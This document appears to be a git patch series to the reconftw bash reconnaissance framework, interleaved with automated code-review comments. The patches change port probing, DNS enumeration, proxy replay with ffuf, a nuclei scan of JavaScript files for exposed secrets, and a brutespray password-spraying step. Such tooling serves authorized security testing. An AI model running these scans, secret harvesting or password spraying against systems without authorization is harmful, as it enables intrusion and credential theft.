@@ -623,6 +623,11 @@ function webprobe_simple(){ deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] + then + notification "Sending websites to proxy" info + eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" 
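Review bot: Dropping `sed "s/*.//"` from the `NUMOFLINES` line means certificate-transparency entries keep a leading `*.` when written to `.tmp/crtsh_subs.txt`, whereas reconftw.sh's passive stage in the previous patch still strips it before counting; unless a later stage removes the prefix, those wildcard names reach the resolver as literal `*.` hosts and can only fail, and the count reported by `end_subfunc` includes them. If the strip was removed because the prefix is now handled elsewhere, a comment on the line should say where. sub_crt continues outside the hunk.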
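Review bot: The added proxy block is a third copy of the same four lines (reconftw.sh's webprobe_simple has it in context, and this patch adds it once more to reconftw_axiom.sh's webprobe_full), differing only in the file name and the message; a helper along the lines of `send_to_proxy <file> <label>` would keep the `1500` cap and the ffuf invocation in one place. On the condition line, `$(cat webs/webs.txt| wc -l)` can be `$(wc -l < webs/webs.txt)`, and the hard-coded `1500` would read better as a reconftw.cfg option next to `proxy_url`. webprobe_simple continues outside the hunk.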
@@ -636,11 +641,17 @@ function webprobe_full(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ]
 then
 start_func "Http probing non standard ports"
- eval axiom-scan subdomains/subdomains.txt -m httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -timeout 10 -threads $HTTPX_UNCOMMONPORTS_THREADS -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt
+ eval axiom-scan subdomains/subdomains.txt -m nmapx -p $UNCOMMON_PORTS_WEB --max-retries 2 -Pn -o .tmp/nmap_uncommonweb.txt $DEBUG_STD && uncommon_ports_checked=$(cat .tmp/nmap_uncommonweb.txt | egrep -v "^#|Status: Up" | cut -d' ' -f4- | sed -n -e 's/Ignored.*//p' | tr ',' '\n' | sed -e 's/^[ \t]*//' | sort -u | cut -d '/' -f1 | sed -e 'H;${x;s/\n/,/g;s/^,//;p;};d')
+ eval axiom-scan subdomains/subdomains.txt -m httpx -ports $uncommon_ports_checked -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt
 NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l)
 notification "Uncommon web ports: ${NUMOFLINES} new websites" good
 eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR
 end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]}
+ if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs_uncommon_ports.txt| wc -l) -le 1500 ]]
+ then
+ notification "Sending websites uncommon ports to proxy" info
+ eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD
+ fi
 else
 if [ "$WEBPROBEFULL" = false ]; then
 printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
@@ -654,8 +665,8 @@ function screenshot(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ]
 then
 start_func "Web Screenshots"
- eval axiom-scan webs/webs.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD
- eval axiom-scan webs/webs_uncommon_ports.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD
+ eval cat webs/webs.txt webs/webs_uncommon_ports.txt $DEBUG_ERROR | anew -q .tmp/webs_screenshots.txt
+ eval axiom-scan .tmp/webs_screenshots.txt -m gowitness -o screenshots $DEBUG_STD
 end_func "Results are saved in screenshots folder" ${FUNCNAME[0]}
 else
 if [ "$WEBSCREENSHOT" = false ]; then
@@ -718,7 +729,7 @@ function portscan(){
 if [ "$PORTSCAN_ACTIVE" = true ]
 then
- eval axiom-scan .tmp/ips_nowaf.txt -m nmap --top-ports 1000 -sV -n --max-retries 2 -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD
+ eval axiom-scan .tmp/ips_nowaf.txt -m nmapx --top-ports 1000 -sV -n -Pn --max-retries 2 -o hosts/portscan_active.txt $DEBUG_STD
 fi
 end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]}
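Review bot: The second added line passes `-ports $uncommon_ports_checked` to httpx without checking that the nmapx step produced anything; when no port is open, or when axiom-scan fails so the `&&`-chained assignment never runs, the expansion is empty and httpx is handed `-ports -follow-host-redirects`, i.e. the next flag as its port list. Guard the probe, `[ -n "$uncommon_ports_checked" ] && eval axiom-scan subdomains/subdomains.txt -m httpx -ports $uncommon_ports_checked …`, or emit a notification and skip. The variable is also not declared `local`, so if the function runs more than once in one process (multi_recon iterating targets, for instance) a value from a previous target could be reused silently. webprobe_full's body begins before the hunk.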
@@ -883,10 +894,8 @@ function urlchecks(){
 then
 start_func "URL Extraction"
 mkdir -p js
- eval axiom-scan webs/webs.txt -m waybackurls -o .tmp/url_extract_way_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_way_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt
 eval axiom-scan webs/webs.txt -m gau -o .tmp/url_extract_gau_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_gau_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt
- diff_webs=$(diff <(sort -u .tmp/probed_tmp.txt) <(sort -u webs/webs.txt) | wc -l)
 if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; then
@@ -909,6 +918,11 @@ function urlchecks(){
 NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l)
 notification "${NUMOFLINES} new urls with params" info
 end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]}
+ if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1500 ]]
+ then
+ notification "Sending urls to proxy" info
+ eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD
+ fi
 else
 printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
 fi
@@ -970,7 +984,7 @@ function jschecks(){
 cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt
 cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt
 printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n"
- eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt
+ eval axiom-scan js/jsfile_links.txt -m httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt
 printf "${yellow} Running : Gathering endpoints 3/5${reset}\n"
 if [ -s "js/js_livelinks.txt" ]
 then
@@ -984,7 +998,7 @@ function jschecks(){
 printf "${yellow} Running : Gathering secrets 4/5${reset}\n"
 if [ -s "js/js_livelinks.txt" ]
 then
- eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD
+ eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD
 fi
 printf "${yellow} Running : Building wordlist 5/5${reset}\n"
 if [ -s "js/js_livelinks.txt" ]
@@ -1033,8 +1047,7 @@ function wordlist_gen(){
 function brokenLinks(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then
 start_func "Broken links checks"
- if [ ! -s ".tmp/gospider.txt" ] ;
- then
+ if [ ! -s ".tmp/gospider.txt" ]; then
 if [ "$DEEP" = true ] ; then
 eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD
 else
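Review bot: The rewritten httpx line still filters live links with `grep "[200]"`, a bracket expression that matches any line containing a `2` or a `0`, so `[404]`, `[301]`, `[500]` and most other statuses pass into js/js_livelinks.txt and are then fed to the endpoint and secret steps; the intended literal match is `grep -F "[200]"` (the brokenLinks hunks escape the bracket for the same reason). Replacing `-follow-host-redirects` with `-follow-redirects` also lets the probe follow off-host redirects, so a surviving URL may sit on a third-party host that the later nuclei step then scans; if that is not intended, keep the host-restricted flag or filter on `.$domain` as the other stages do. jschecks's body starts outside the hunk.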
@@ -1042,7 +1055,7 @@ function brokenLinks(){
 fi
 cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt
 fi
- cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt
+ cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt
 NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l)
 notification "${NUMOFLINES} new broken links found" info
 end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]}
@@ -1280,7 +1293,7 @@ function spraying(){
 then
 start_func "Password spraying"
 cd $tools/brutespray
- eval python3 $tools/brutespray/brutespray.py --file $dir/.tmp/nmap_grep.gnmap --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD
+ eval python3 $tools/brutespray/brutespray.py --file $dir/hosts/portscan_active.txt --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD
 cd $dir
 end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]}
 else
@@ -1674,6 +1687,8 @@ function multi_recon(){
 function subs_menu(){
 start
 subdomains_full
+ webprobe_full
+ screenshot
 subtakeover
 zonetransfer
 s3buckets
From 7e6b7633425203b2bc0c01d7e34be1fe0025b462 Mon Sep 17 00:00:00 2001
From: six2dez
Date: Sat, 24 Apr 2021 15:48:01 +0200
Subject: [PATCH 19/19] dnsx fix
---
 reconftw.sh | 4 ++--
 reconftw_axiom.sh | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/reconftw.sh b/reconftw.sh
index 9ec58e93..759c88a1 100755
--- a/reconftw.sh
+++ b/reconftw.sh
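Review bot: `--file` now points brutespray at hosts/portscan_active.txt, which the portscan hunk (`@@ -718,7 +729,7 @@`) writes through the nmapx module's `-o` in place of the dedicated `-oG` greppable file the old line consumed. The webprobe_full hunk parses nmapx output with gnmap markers (`Status: Up`, `Ignored`), which suggests `-o` does yield greppable output, but nothing on the page confirms brutespray accepts it, and a format mismatch would show up only as an empty spray with the error hidden behind $DEBUG_STD. A guard before the `cd`, `[ -s "$dir/hosts/portscan_active.txt" ] || { notification "No active portscan output for brutespray" warn; return; }`, makes the missing-input case explicit (the notification level name is a placeholder; use whatever the helper accepts). spraying's body begins outside the hunk.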
@@ -376,7 +376,7 @@ function sub_active(){
 cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt
 deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt
 eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
- echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt
+ echo $domain | eval dnsx -retry 3 -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt
 NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
 end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]}
 else
@@ -388,7 +388,7 @@ function sub_dns(){
 if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
 then
 start_subfunc "Running : DNS Subdomain Enumeration"
- eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD
+ eval dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -silent -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD
 cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt
 eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
 NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh
index 9448e5a2..4d31eb43 100755
--- a/reconftw_axiom.sh
+++ b/reconftw_axiom.sh
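Review bot: The sub_dns call now asks dnsx for A, AAAA, NS, PTR, MX and SOA records as well as CNAME, but the unchanged parse on the next line, `cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$"`, still treats every bracketed value as a hostname and keeps only those ending in the domain, so IP answers and external NS/MX/SOA targets are silently dropped while in-scope NS/MX hosts are now handed to puredns. That is plausibly the intent, but the output file is still called subdomains_cname.txt and nothing records the assumption; a comment above the call such as `# all record types are requested; the grep below keeps only in-scope hostnames and drops IPs and external targets` would stop the next reader from "fixing" the filter. The same change, with `-silent` also dropped, is in the reconftw_axiom.sh sub_dns hunk (`@@ -391,7 +391,7 @@`). sub_dns's body continues outside the hunk.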
@@ -379,7 +379,7 @@ function sub_active(){
 cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt
 deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt
 eval axiom-scan .tmp/subs_no_resolved.txt -m puredns-resolve -o .tmp/subdomains_tmp.txt $DEBUG_STD
- echo $domain | dnsx -silent -retry 3 | anew -q .tmp/subdomains_tmp.txt
+ echo $domain | eval dnsx -retry 3 -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt
 NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
 end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]}
 else
@@ -391,7 +391,7 @@ function sub_dns(){
 if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
 then
 start_subfunc "Running : DNS Subdomain Enumeration"
- eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -silent -cname -resp -o subdomains/subdomains_cname.txt $DEBUG_STD
+ eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -o subdomains/subdomains_cname.txt $DEBUG_STD
 cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt
 eval axiom-scan .tmp/subdomains_dns.txt -m puredns-resolve -o .tmp/subdomains_dns_resolved.txt $DEBUG_STD
 NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l)